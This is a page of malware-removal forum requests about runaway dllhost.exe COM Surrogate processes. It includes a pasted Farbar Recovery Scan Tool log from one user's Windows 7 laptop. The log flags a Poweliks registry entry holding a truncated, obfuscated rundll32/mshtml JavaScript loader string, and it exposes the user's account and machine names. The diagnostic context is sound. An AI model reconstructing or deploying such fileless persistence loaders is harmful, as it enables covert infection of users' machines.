==================== End Of Log ============================
  9. Please help with dllhost.exe *32 COM surrogate removal. dllhost.exe process using up 100% of CPU. Please see enclosed scan files. Need fixlist.txt file. Thanks! FRST.txt Addition.txt Shortcut.txt malwarebytes threat scan log.txt
  10. Hi, I'm new to the site but in desperate need of help. Usually I can rid my pc of infections with free online software. However, this one seems to be quite nasty. I've done a lot of research on the problem and even seen people on this site having the same issue. In the task manager I have several instances of dllhoste.exe *32 running and eating up all the memory in my pc to the point of almost being completely unfunctional. I located the file in C:/ Windows/ SysWOW64 and tried to delete the .exe file, but of course I was unable to because I did not have permission to perform the action despite my administrator privileges. I did, however, download FRST and run a full scan. I will attach the results of the FRST.txt and Addition.txt files in hopes to start the recovery process. Is there anyone who can help me vanquish this demon? Thanks in advance for any help I may receive! FRST.txt Addition.txt
  11. Hello, I am having issues with multiple "dllhost.exe *32" COM Surrogate processes running, and these processes keep coming back even after manually deleting them. "dllhost.exe *32 COM Surrogate process" hogs the CPU and memory of my system. Also, I am getting periodic "Powershell has stopped working" messages. I searched for an online solution and found one topic on this website (https://forums.malwarebytes.org/index.php?/topic/148375-issue-with-dllhostexe-com-surrogate/) and followed the steps, but my issue was not resolved. Either I missed something or did not follow the steps correctly, so I am starting a fresh thread. I would appreciate your help. Thanks, Arun. When I posted the FRST and Addition log results here, it complained of the post being too long. So I am attaching the Addition logs and pasting FRST below.
      Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-09-2014 02
      Ran by akumar (administrator) on AKUMAR on 06-09-2014 22:48:13
      Running from C:\Users\akumar\Desktop\FRST
      Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
      Internet Explorer Version 9
      Boot Mode: Normal
C:\Windows\System32\TpShocks.exe () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Hewlett-Packard Company) C:\Hewlett-Packard\ESS Sizers\Smart Update Process\Bin\HPSizingToolUpdateProcess.exe (Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe () C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\UIExec.exe (RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe (Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe (Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE (Microsoft Corporation) C:\Windows\System32\taskmgr.exe (Apple Inc.) 
C:\Program Files\iPod\bin\iPodService.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [ALCKRESI.EXE] => C:\Program Files\Lenovo\AutoLock\ALCKRESI.EXE [386408 2011-09-27] (Lenovo Group Limited) HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2868496 2011-12-23] (Synaptics Incorporated) HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [44096 2012-01-16] (Lenovo Group Limited) HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-03-29] (Lenovo.) HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] () HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2010-12-14] (Conexant systems, Inc.) HKLM-x32\...\Run: [RotateImage] => C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe [55808 2008-10-30] (Ricoh co.,Ltd.) 
HKLM-x32\...\Run: [PWMTRV] => rundll32 C:\PROGRA~2\ThinkPad\UTILIT~1\PWMTR64V.DLL,PwrMgrBkGndMonitor HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [uIExec] => C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\UIExec.exe [139088 2011-04-02] () HKLM-x32\...\Run: [McAfee Host Intrusion Prevention Tray] => C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireTray.exe [979104 2010-06-15] (McAfee, Inc.) HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [295512 2013-06-19] (RealNetworks, Inc.) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [shStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [243560 2014-01-15] (McAfee, Inc.) HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-01-20] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.) HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337768 2014-02-20] (McAfee, Inc.) HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [707496 2014-06-10] (Cisco Systems, Inc.) 
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer: [NoFolderOptions] 0 HKLM\...\Policies\Explorer: [NoControlPanel] 0 HKU\S-1-5-21-4217662095-1469401848-865576887-500-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {9849b1c8-416e-11e1-b55c-806e6f6e6963} - D:\SETUP.EXE HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-08] (Adobe Systems Incorporated) HKU\S-1-5-21-998467208-754410358-1295600288-10396\...\MountPoints2: {f442b3af-4fae-11e2-b8c5-a088b459be00} - E:\Windows\Autorun.exe HKU\S-1-5-21-998467208-754410358-1295600288-10396\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! 
HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2013-04-22] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation) HKU\S-1-5-21-998467208-754410358-1295600288-10396-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {f442b3af-4fae-11e2-b8c5-a088b459be00} - E:\Windows\Autorun.exe Startup: C:\Users\akumar\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Sizing Tool Update Process.lnk ShortcutTarget: HP Sizing Tool Update Process.lnk -> C:\Hewlett-Packard\ESS Sizers\Smart Update Process\Bin\HPSizingToolUpdateProcess.exe (Hewlett-Packard Company) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xB59DC4B28363CE01 HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.7.0_51\bin\ssv.dll (Oracle Corporation) BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20140718131315.dll (McAfee, Inc.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) 
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.7.0_51\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\ssv.dll (Oracle Corporation) BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20140718131316.dll (McAfee, Inc.) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) BHO-x32: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) 
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\jp2ssv.dll (Oracle Corporation) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKLM-x32 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) DPF: HKLM-x32 {00000035-9593-4264-8B29-930B3E4EDCCD} https://www.rooms.hp.com/vRoom_Cab/WebHPVCInstall35.cab DPF: HKLM-x32 {67AB7FBE-251A-49E7-87EE-442F120D9364} https://acmepacket.acceptondemand.com/InstallClient/AcceptClient_IE.cab DPF: HKLM-x32 {CF84DAC5-A4F5-419E-A0BA-C01FFD71112F} http://content.systemrequirementslab.com.s3.amazonaws.com/global/bin/srldetect_intel_4.5.5.0.cab DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T27L10NSP32EP15-15155/webex/ieatgpc1.cab Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McIEPlg.dll (McAfee, Inc.) 
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF ProfilePath: C:\Users\akumar\AppData\Roaming\Mozilla\Firefox\Profiles\mvs3zhtd.default FF Homepage: hxxp://my.oracle.com/site/nasc FF NetworkProxy: "autoconfig_url", "http://wpad.us.oracle.com/wpad.dat" FF NetworkProxy: "type", 2 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll () FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre1.7.0_51\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre1.7.0_51\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre1.7.0_51\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: 
@microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.2 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.) FF Plugin-x32: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer) FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npatgpc.dll (Cisco WebEx LLC) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.) 
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprpplugin.dll (RealPlayer) FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14] FF HKLM-x32\...\Firefox\Extensions: [{B7082FAA-CB62-4872-9106-E42DD88EDE45}] - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise FF Extension: McAfee SiteAdvisor Enterprise - C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise [2013-06-03] FF HKLM-x32\...\Firefox\Extensions: [{FCE04E1F-9378-4f39-96F6-5689A9159E45}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-06-19] FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore FF Extension: IDS_SS_NAME - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2013-09-30] Chrome: ======= CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files 
(x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation) R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation) S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [320576 2012-03-15] (Lenovo.) R2 enterceptAgent; C:\Program Files (x86)\McAfee\Host Intrusion Prevention\FireSvc.exe [1498224 2010-06-15] (McAfee, Inc.) R2 hips; C:\Program Files (x86)\McAfee\Host Intrusion Prevention\HIPSCore\x64\HIPSvc.exe [39840 2010-01-26] (McAfee, Inc.) R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [133992 2011-07-12] (Lenovo Group Limited) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation) R2 McAfee SiteAdvisor Enterprise Service; C:\Program Files (x86)\McAfee\SiteAdvisor Enterprise\McSACore.exe [324928 2011-05-12] (McAfee, Inc.) R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127848 2014-02-20] (McAfee, Inc.) R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [242448 2014-07-18] (McAfee, Inc.) R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208416 2014-01-15] (McAfee, Inc.) R2 mfevtp; C:\Windows\system32\mfevtps.exe [185280 2014-07-18] (McAfee, Inc.) 
R2 MyDesktopWindows; C:\ProgramData\Oracle\MyDesktop\MyDesktopService.exe [5364224 2013-07-05] (Oracle Corporation) [File not signed] R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [69632 2006-11-08] (Hewlett-Packard) [File not signed] R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [88064 2006-11-08] (Hewlett-Packard) [File not signed] R2 QOSMyDesktop; C:\ProgramData\Oracle\MyDesktop\MyDesktopQOS.exe [470016 2009-10-13] (Oracle) [File not signed] R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] () R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2011-09-01] (Lenovo Group Limited) S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [24120 2014-02-21] () R2 TIRmtSvc; C:\WINDOWS\TIREMOTE\TIRemoteService.exe [210944 2012-05-04] (Numara Software, Inc.) [File not signed] R2 UI Assistant Service; C:\Program Files (x86)\TATA DOCOMO 3G\ZTE\AssistantServices.exe [270672 2012-02-01] () R2 UleadBurningHelper; C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed] R2 SAService; %SystemRoot%\system32\SAsrv.exe [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2011-06-02] () R1 DNE; C:\Windows\System32\DRIVERS\dnelwf64.sys [131672 2010-12-06] (Deterministic Networks, Inc.) U5 Firehk; C:\Windows\System32\Drivers\Firehk.sys [56648 2008-10-17] (McAfee, Inc.) R3 FirehkMP; C:\Windows\System32\DRIVERS\firehk.sys [56648 2008-10-17] (McAfee, Inc.) R3 firelm01; C:\Windows\system32\drivers\firelm01.sys [38968 2010-06-15] (McAfee, Inc.) R0 FirePM; C:\Windows\System32\Drivers\FirePM.sys [186784 2010-06-15] (McAfee, Inc.) 
R1 FireTDI; C:\Windows\system32\Drivers\FireTDI.sys [254520 2010-06-15] (McAfee, Inc.) R3 HIPK; C:\Windows\System32\drivers\HIPK.sys [138904 2010-01-26] (McAfee, Inc.) R3 HIPPSK; C:\Windows\System32\drivers\HIPPSK.sys [45424 2010-01-26] (McAfee, Inc.) R3 HIPQK; C:\Windows\System32\drivers\HIPQK.sys [40152 2010-01-26] (McAfee, Inc.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-06] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation) R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [180272 2014-07-18] (McAfee, Inc.) R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [311600 2014-07-18] (McAfee, Inc.) U3 mfeavfk01; No ImagePath R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [782968 2014-07-18] (McAfee, Inc.) S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [107032 2014-07-18] (McAfee, Inc.) S4 mfetdik; C:\Windows\System32\drivers\mfetdik.sys [84424 2010-10-22] (McAfee, Inc.) R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344176 2014-07-18] (McAfee, Inc.) S3 vpnva; C:\Windows\System32\DRIVERS\vpnva64-6.sys [52592 2014-06-10] (Cisco Systems, Inc.) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-06 21:52 - 2014-09-06 21:52 - 00133028 _____ () C:\Windows\SysWOW64\api_hook_list.dat 2014-09-06 21:52 - 2014-09-06 21:52 - 00002033 _____ () C:\Windows\system32\api_hook_list.dat 2014-09-06 21:51 - 2010-01-26 17:56 - 